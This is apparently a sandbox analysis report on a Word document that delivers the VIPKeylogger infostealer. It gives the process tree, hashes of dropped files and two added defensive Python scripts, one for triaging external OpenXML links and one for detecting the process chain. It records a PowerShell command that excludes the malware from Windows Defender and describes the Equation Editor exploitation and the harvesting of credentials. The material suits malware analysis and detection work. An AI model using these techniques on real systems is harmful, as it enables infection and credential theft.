Analysis

  • max time kernel
    132s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-10-2024 07:09

General

  • Target

    KBGC_1200O000000_98756.docx

  • Size

    264KB

  • MD5

    da3b3b9590907c35f64e830b2b244ffd

  • SHA1

    8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1

  • SHA256

    97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825

  • SHA512

    98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1

  • SSDEEP

    6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#. It resembles SnakeKeylogger, which was first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes.

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs
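
The "Abuses OpenXML format to download file from external location" signature above refers to a relationship inside the .docx package whose target is a URL rather than a part in the archive; Word resolves such relationships when the document is opened, which is consistent with the wealthzxcv[1].doc cached under Content.IE5 in the Downloads list. The script below is an added example, not code from the sandbox or from the sample on this page. It walks every .rels part of an OPC package, lists relationships with TargetMode="External", and separates the types Office fetches automatically (oleObject, attachedTemplate, frame, subDocument) from plain hyperlinks. The sample package it builds is constructed in memory for the example; the URL in it is a placeholder and the relationship layout is illustrative, not taken from the analysed file.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types that Office resolves on open; an external target on one
# of these is a second-stage download, not just a clickable link.
FETCHING_REL_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument"}


def find_external_relationships(docx_bytes):
    """Return (rels_part, relationship_type, target) for every relationship
    carrying TargetMode="External" in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(PKG_REL_NS + "Relationship"):
                # TargetMode defaults to Internal when the attribute is absent
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append((part, rel_type, rel.get("Target", "")))
    return findings


def fetching_relationships(findings):
    """Keep only the external relationships Office follows without a click."""
    return [f for f in findings if f[1] in FETCHING_REL_TYPES]


def build_sample_docx(target_url):
    """Construct a minimal .docx whose document part links an OLE object to an
    external URL. Constructed test input for this example, not the page's sample."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    root_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL_BASE}officeDocument" Target="word/document.xml"/>'
        '</Relationships>'
    )
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" '
        'xmlns:o="urn:schemas-microsoft-com:office:office">'
        '<w:body><w:p><w:r><w:object>'
        '<o:OLEObject Type="Link" ProgID="Word.Document.8" r:id="rId2" UpdateMode="Always"/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        # a benign external hyperlink, present to show the filtering step
        f'<Relationship Id="rId1" Type="{OFFICE_REL_BASE}hyperlink" '
        'Target="https://example.invalid/" TargetMode="External"/>'
        # the linked OLE object: this is what makes Word fetch the target on open
        f'<Relationship Id="rId2" Type="{OFFICE_REL_BASE}oleObject" '
        f'Target="{target_url}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample_docx("http://example.invalid/wealthzxcv.doc")  # placeholder URL
    for part, rel_type, target in find_external_relationships(data):
        flag = "FETCH" if rel_type in FETCHING_REL_TYPES else "link "
        print(f"[{flag}] {part}: {rel_type} -> {target}")
```

Run it with a .docx path to triage a real file offline; without arguments it analyses the constructed sample. Because the check is purely structural (it never follows the URL), it is safe to run on a suspected document, and it catches the external target regardless of which part (document, header, settings, embedded OLE) carries the relationship.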

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\KBGC_1200O000000_98756.docx"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2668
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
        "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:972
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2556
        • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
          "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2124
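
The process tree above carries four behaviours a detection engineer would alert on: Equation Editor (EQNEDT32.EXE) spawning a child at all, an executable launched from the user's AppData\Roaming, a process spawning a second copy of its own image (paired here with SetThreadContext and WriteProcessMemory), and powershell.exe calling Add-MpPreference to exclude that executable from Windows Defender. The script below is an added example, not code from the sandbox or from the malware. Its events are constructed from the listing above (images, PIDs and command lines as shown); the parents of the two top-level processes are not given in the report and are left as None, and the rule names are the author's own.

```python
import ntpath
import re

# Constructed process-creation events modelled on the tree in this report.
# Parent PIDs of the two top-level processes are not shown there (assumption: None).
EVENTS = [
    {"pid": 2268, "ppid": None,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\KBGC_1200O000000_98756.docx"'},
    {"pid": 3024, "ppid": None,
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 972, "ppid": 3024,
     "image": r"C:\Users\Admin\AppData\Roaming\wealtken20309.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'},
    {"pid": 2556, "ppid": 972,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'},
    {"pid": 2124, "ppid": 972,
     "image": r"C:\Users\Admin\AppData\Roaming\wealtken20309.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"'},
]

# Add-MpPreference / Set-MpPreference with any exclusion switch; the excluded
# value is either a quoted string (may contain spaces) or one unquoted token.
EXCLUSION_RE = re.compile(
    r'(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\s+(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)

# Directories a standard user can write to; executables here deserve a look.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def evaluate(events):
    """Return (rule, pid, detail) for every rule an event matches."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        parent_name = ntpath.basename(parent["image"]).lower() if parent else None
        image_lower = e["image"].lower()

        # Equation Editor is a COM server that renders formulas; it has no
        # business creating processes (see CVE-2017-11882 in the signatures).
        if parent_name == "eqnedt32.exe":
            findings.append(("equation_editor_child", e["pid"], e["image"]))

        # A process starting a second instance of its own image, as
        # wealtken20309.exe does here, is the usual prelude to hollowing.
        if parent and parent["image"].lower() == image_lower:
            findings.append(("self_spawn", e["pid"], e["image"]))

        m = EXCLUSION_RE.search(e["cmdline"])
        if m:
            findings.append(("defender_exclusion", e["pid"], m.group(1) or m.group(2)))

        if image_lower.endswith(".exe") and any(d in image_lower for d in USER_WRITABLE):
            findings.append(("exec_from_user_profile", e["pid"], e["image"]))
    return findings


def lineage(events, pid):
    """Image basenames from the outermost known ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid, detail in evaluate(EVENTS):
        print(f"{rule:24} pid={pid:<5} {' -> '.join(lineage(EVENTS, pid))}")
        print(f"{'':24} {detail}")
```

The defender_exclusion hit is the one to prioritise: an exclusion for a path under AppData\Roaming set by a process that itself descends from Equation Editor is not something an administrator does by hand, and the exclusion outlives the sandbox run, so an incident responder should remove it (Remove-MpPreference) rather than only deleting the file.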

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{ACEBAEC4-765A-4237-BF1B-963978C098F2}.FSD

      Filesize

      128KB

      MD5

      6525ff48244a83bf4b4caf12d062272a

      SHA1

      c28ff4daba8e7c6a2a03c092add29b788435cab2

      SHA256

      85e63fdaef9a9863578d0606d1d20257919356a91c9f7957226533d87579fcb2

      SHA512

      8ac4e911ec575c78d60039c5209bd3df848d9aa26271c246642dff6a30edd0958d3a7ad53c2e337f6173409364cb9392c89483fff679cdd66220638fdd452775

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      7ddb1ecbe2119fe34d556e66113a03ef

      SHA1

      508ae02a1796d7d67c7f3e0bb094245d3524979a

      SHA256

      2c42f15b5b634a9b374b0b944768b2bc53d0243e5d99f15080f3d18014743d56

      SHA512

      d4f6508f0783bb41a1c556915e0338082c17630e49f04a35cbd1dbc8e0969752c75172ce931a3c7278ae434aa16d988e231d70bea0fb0bdec855b15948cf3f62

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5985D274-E8CA-4149-AED2-A4A0F961D17E}.FSD

      Filesize

      128KB

      MD5

      f1dabd1b0c1aa59a585b142abec129c5

      SHA1

      e2bd67f6359d59c9b70e6f9e5bf1861c93f86495

      SHA256

      ab3951c530f7dfbb45896efe50a189610a17f94d495b7bd90e4f03fec5217427

      SHA512

      c53b858a095299f6e665bc99b5e1ca1b672fea19727f97a20a1395b041da372155a03c3005b3feba3babfbb25fb096c73882bb3c022c6f46f6c59d7101069313

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\wealthzxcv[1].doc

      Filesize

      565KB

      MD5

      adbffccbb78834fa492cc7ca8a676e52

      SHA1

      1e5b065d13fa03fb556a7ff315b85db96d369908

      SHA256

      42d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63

      SHA512

      de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33

    • C:\Users\Admin\AppData\Local\Temp\{71085DCC-B725-4F89-B6AD-E380E016AB80}

      Filesize

      128KB

      MD5

      2d292830ca43ddc1dae746b5b1b3f449

      SHA1

      9d66599e5cdc2b06a96530612fb5cffd192ea0ac

      SHA256

      5248e86bb707bbad937d704882ea503d31eec59e3255bcfd6e82fd3fe3be35bd

      SHA512

      d4fea9c51e1eedb92edc3214971818e9d964ea26600cf75c7597f007784172c5a646e1ce8b11cbf4ce77da952e52a08e18fa2364a67904c074256e33c2f9ae69

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • \Users\Admin\AppData\Roaming\wealtken20309.exe

      Filesize

      858KB

      MD5

      d237ebe34f35a9ffe99f5efe0474c1e2

      SHA1

      573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1

      SHA256

      ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137

      SHA512

      9393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05

    • memory/972-96-0x0000000000510000-0x000000000052E000-memory.dmp

      Filesize

      120KB

    • memory/972-104-0x00000000001C0000-0x000000000024A000-memory.dmp

      Filesize

      552KB

    • memory/972-94-0x0000000001300000-0x00000000013DC000-memory.dmp

      Filesize

      880KB

    • memory/2124-116-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-105-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2124-117-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-114-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-111-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-109-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2124-107-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2268-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2268-103-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2268-0-0x000000002F8D1000-0x000000002F8D2000-memory.dmp

      Filesize

      4KB

    • memory/2268-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB